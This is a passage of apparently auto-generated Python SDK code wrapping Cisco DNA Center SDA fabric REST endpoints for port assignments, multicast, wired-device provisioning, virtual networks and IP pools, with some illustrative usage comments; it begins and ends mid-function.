json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_bd26b08b64545bae20f60c56891576_v2_2_2_3', json_data)
def get_port_assignment_for_access_point(self,
device_ip,
interface_name,
headers=None,
**request_parameters):
"""Get Port assignment for access point in SDA Fabric .
Args:
device_ip(basestring): device-ip query parameter.
interface_name(basestring): interfaceName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ip, basestring,
may_be_none=False)
check_type(interface_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'device-ip':
device_ip,
'interfaceName':
interface_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/hostonboarding/access-'
+ 'point')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_b035b0b3b60b5f2bb7c8c82e7f94b63b_v2_2_2_3', json_data)
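# Illustrative usage sketch for the access-point port-assignment trio above:
# add takes a list payload, while get and delete key on the device IP and the
# interface name. Payload field names are assumptions from the public SDA API:
#
#   dnac.sda.add_port_assignment_for_access_point(payload=[{
#       "deviceManagementIpAddress": "10.10.20.1",
#       "interfaceName": "GigabitEthernet1/0/10",
#       "siteNameHierarchy": "Global/San Jose/Building-1",
#   }])
#   dnac.sda.get_port_assignment_for_access_point(
#       device_ip="10.10.20.1", interface_name="GigabitEthernet1/0/10")
#   dnac.sda.delete_port_assignment_for_access_point(
#       device_ip="10.10.20.1", interface_name="GigabitEthernet1/0/10")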
def delete_port_assignment_for_user_device(self,
device_ip,
interface_name,
headers=None,
**request_parameters):
"""Delete Port assignment for user device in SDA Fabric. .
Args:
device_ip(basestring): device-ip query parameter.
interface_name(basestring): interfaceName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ip, basestring,
may_be_none=False)
check_type(interface_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'device-ip':
device_ip,
'interfaceName':
interface_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/hostonboarding/user-'
+ 'device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_cb88b50dd5ead96ecfb4ab0390f47_v2_2_2_3', json_data)
def add_port_assignment_for_user_device(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add Port assignment for user device in SDA Fabric. .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_af29516f0c8591da2a92523b5ab3386_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/hostonboarding/user-'
+ 'device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_af29516f0c8591da2a92523b5ab3386_v2_2_2_3', json_data)
def get_port_assignment_for_user_device(self,
device_ip,
interface_name,
headers=None,
**request_parameters):
"""Get Port assignment for user device in SDA Fabric. .
Args:
device_ip(basestring): device-ip query parameter.
interface_name(basestring): interfaceName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ip, basestring,
may_be_none=False)
check_type(interface_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'device-ip':
device_ip,
'interfaceName':
interface_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/hostonboarding/user-'
+ 'device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_a446d7327733580e9a6b661715eb4c09_v2_2_2_3', json_data)
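# Illustrative usage sketch for the user-device port-assignment calls above;
# they mirror the access-point variants, with the payload fields again being
# assumptions to verify against your controller:
#
#   dnac.sda.add_port_assignment_for_user_device(payload=[{
#       "deviceManagementIpAddress": "10.10.20.1",
#       "interfaceName": "GigabitEthernet1/0/11",
#       "siteNameHierarchy": "Global/San Jose/Building-1",
#   }])
#   dnac.sda.get_port_assignment_for_user_device(
#       device_ip="10.10.20.1", interface_name="GigabitEthernet1/0/11")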
def add_multicast_in_sda_fabric(self,
fabricSiteNameHierarchy=None,
multicastMethod=None,
multicastVnInfo=None,
muticastType=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add multicast in SDA fabric .
Args:
fabricSiteNameHierarchy(string): SDA's fabricSiteNameHierarchy .
multicastMethod(string): SDA's multicast method. Available values are 'native_multicast' and ''.
multicastVnInfo(object): SDA's multicastVnInfo.
muticastType(string): SDA's multicast type (parameter name as defined by the API). Available values are 'ssm', 'asm_with_external_rp' and ''.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = {
'fabricSiteNameHierarchy':
fabricSiteNameHierarchy,
'multicastMethod':
multicastMethod,
'muticastType':
muticastType,
'multicastVnInfo':
multicastVnInfo,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_b7079a38844e56dd8f1b6b876880a02e_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/multicast')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_b7079a38844e56dd8f1b6b876880a02e_v2_2_2_3', json_data)
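# Illustrative usage sketch: unlike the list-payload calls above, this method
# builds a dict payload from named arguments (the muticastType argument name
# follows the API schema). The multicastVnInfo structure shown is an assumption
# to check against the API reference:
#
#   dnac.sda.add_multicast_in_sda_fabric(
#       fabricSiteNameHierarchy="Global/San Jose/Building-1",
#       multicastMethod="native_multicast",
#       muticastType="ssm",
#       multicastVnInfo={"virtualNetworkName": "Campus_VN",
#                        "ipPoolName": "Multicast_Pool"})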
def get_multicast_details_from_sda_fabric(self,
fabric_site_name_hierarchy,
headers=None,
**request_parameters):
"""Get multicast details from SDA fabric .
Args:
fabric_site_name_hierarchy(basestring): fabricSiteNameHierarchy query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(fabric_site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'fabricSiteNameHierarchy':
fabric_site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/multicast')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_c27bbb42365955bc210924e1362c34_v2_2_2_3', json_data)
def delete_multicast_from_sda_fabric(self,
fabric_site_name_hierarchy,
headers=None,
**request_parameters):
"""Delete multicast from SDA fabric .
Args:
fabric_site_name_hierarchy(basestring): fabricSiteNameHierarchy query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(fabric_site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'fabricSiteNameHierarchy':
fabric_site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/multicast')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_e8e007d3e25f7fb83a6579016aea72_v2_2_2_3', json_data)
def delete_provisioned_wired_device(self,
device_management_ip_address,
headers=None,
**request_parameters):
"""Delete provisioned Wired Device .
Args:
device_management_ip_address(basestring): deviceManagementIpAddress query parameter. Valid IP address of
the device currently provisioned in a fabric site .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_management_ip_address, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceManagementIpAddress':
device_management_ip_address,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/provision-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_e5bd8dbbf65253f0aadd77a62b1b8b58_v2_2_2_3', json_data)
def provision_wired_device(self,
deviceManagementIpAddress=None,
siteNameHierarchy=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Provision Wired Device .
Args:
deviceManagementIpAddress(string): SDA's Device Management Ip Address.
siteNameHierarchy(string): SDA's Site Name Hierarchy.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = {
'deviceManagementIpAddress':
deviceManagementIpAddress,
'siteNameHierarchy':
siteNameHierarchy,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_d1608b2751c883a072ee3fb80228_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/provision-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_d1608b2751c883a072ee3fb80228_v2_2_2_3', json_data)
def get_provisioned_wired_device(self,
device_management_ip_address,
headers=None,
**request_parameters):
"""Get Provisioned Wired Device .
Args:
device_management_ip_address(basestring): deviceManagementIpAddress query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_management_ip_address, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceManagementIpAddress':
device_management_ip_address,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/provision-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_d8f10868c21856eab31776f109aba2bb_v2_2_2_3', json_data)
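# Illustrative usage sketch for the wired-device provisioning calls above:
# provisioning takes the device management IP and the target site, while the
# get and delete variants key on the management IP alone (the `dnac` client is
# an assumption):
#
#   dnac.sda.provision_wired_device(
#       deviceManagementIpAddress="10.10.20.1",
#       siteNameHierarchy="Global/San Jose/Building-1")
#   status = dnac.sda.get_provisioned_wired_device(
#       device_management_ip_address="10.10.20.1")
#   dnac.sda.delete_provisioned_wired_device(
#       device_management_ip_address="10.10.20.1")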
def delete_vn(self,
site_name_hierarchy,
virtual_network_name,
headers=None,
**request_parameters):
"""Delete virtual network (VN) from SDA Fabric .
Args:
virtual_network_name(basestring): virtualNetworkName query parameter.
site_name_hierarchy(basestring): siteNameHierarchy query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(virtual_network_name, basestring,
may_be_none=False)
check_type(site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'virtualNetworkName':
virtual_network_name,
'siteNameHierarchy':
site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_cb9f8ad5359b2b2cbc151ac3a842a_v2_2_2_3', json_data)
def get_vn(self,
site_name_hierarchy,
virtual_network_name,
headers=None,
**request_parameters):
"""Get virtual network (VN) from SDA Fabric .
Args:
virtual_network_name(basestring): virtualNetworkName query parameter.
site_name_hierarchy(basestring): siteNameHierarchy query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(virtual_network_name, basestring,
may_be_none=False)
check_type(site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'virtualNetworkName':
virtual_network_name,
'siteNameHierarchy':
site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_cb1fe08692b85767a42b84340c4c7d53_v2_2_2_3', json_data)
def add_vn(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add virtual network (VN) in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_e3a724a35854758d65a83823c88435_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_e3a724a35854758d65a83823c88435_v2_2_2_3', json_data)
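# Illustrative usage sketch for the virtual-network calls above: a VN is added
# with a list payload and then read or removed by its name plus the site name
# hierarchy. Field names are assumptions from the public SDA API:
#
#   dnac.sda.add_vn(payload=[{
#       "virtualNetworkName": "Campus_VN",
#       "siteNameHierarchy": "Global/San Jose/Building-1",
#   }])
#   vn = dnac.sda.get_vn(virtual_network_name="Campus_VN",
#                        site_name_hierarchy="Global/San Jose/Building-1")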
def get_ip_pool_from_sda_virtual_network(self,
ip_pool_name,
virtual_network_name,
headers=None,
**request_parameters):
"""Get IP Pool from SDA Virtual Network .
Args:
ip_pool_name(basestring): ipPoolName query parameter.
virtual_network_name(basestring): virtualNetworkName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(ip_pool_name, basestring,
may_be_none=False)
check_type(virtual_network_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'ipPoolName':
ip_pool_name,
'virtualNetworkName':
virtual_network_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/virtualnetwork/ippool')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_b88723912610599ba42292db52d1dae4_v2_2_2_3', json_data)
def delete_ip_pool_from_sda_virtual_network(self,
ip_pool_name,
virtual_network_name,
headers=None,
**request_parameters):
"""Delete IP Pool from SDA Virtual Network .
Args:
ip_pool_name(basestring): ipPoolName query parameter.
virtual_network_name(basestring): virtualNetworkName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(ip_pool_name, basestring,
may_be_none=False)
check_type(virtual_network_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'ipPoolName':
ip_pool_name,
'virtualNetworkName':
virtual_network_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/virtualnetwork/ippool')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_c923d016d5401b7a9943724df3844_v2_2_2_3', json_data)
def add_ip_pool_in_sda_virtual_network(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add IP Pool in SDA Virtual Network .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_b07f187b7456c8bbb6088a2f24dcee_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/virtualnetwork/ippool')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_b07f187b7456c8bbb6088a2f24dcee_v2_2_2_3', json_data)
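# Editorial sketch of a call to the wrapper above (not part of the generated
# module). The payload field names are assumptions inferred from the sibling
# query parameters, not a confirmed request schema:
#   sda.add_ip_pool_in_sda_virtual_network(
#       payload=[{'virtualNetworkName': 'GUEST_VN',
#                 'ipPoolName': 'SensorPool'}],
#       active_validation=False)  # skip client-side JSON-schema validation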
def add_virtual_network_with_scalable_groups(self,
scalableGroupNames=None,
virtualNetworkName=None,
virtualNetworkType=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add virtual network with scalable groups at global level .
Args:
scalableGroupNames(list): SDA's Scalable Group Names (list of strings).
virtualNetworkName(string): SDA's Virtual Network Name.
virtualNetworkType(string): SDA's Virtual Network Type.
headers(dict): Dictionary of HTTP Headers to send with the Request.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = {
'virtualNetworkName':
virtualNetworkName,
'virtualNetworkType':
virtualNetworkType,
'scalableGroupNames':
scalableGroupNames,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_f5ebb9d50aab287f320d32181c0_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_f5ebb9d50aab287f320d32181c0_v2_2_2_3', json_data)
def delete_virtual_network_with_scalable_groups(self,
virtual_network_name,
headers=None,
**request_parameters):
"""Delete virtual network with scalable groups .
Args:
virtual_network_name(basestring): virtualNetworkName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(virtual_network_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'virtualNetworkName':
virtual_network_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_f2e8552eabc5e5f97e1f40bcc4b4c75_v2_2_2_3', json_data)
def get_virtual_network_with_scalable_groups(self,
virtual_network_name,
headers=None,
**request_parameters):
"""Get virtual network with scalable groups .
Args:
virtual_network_name(basestring): virtualNetworkName query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
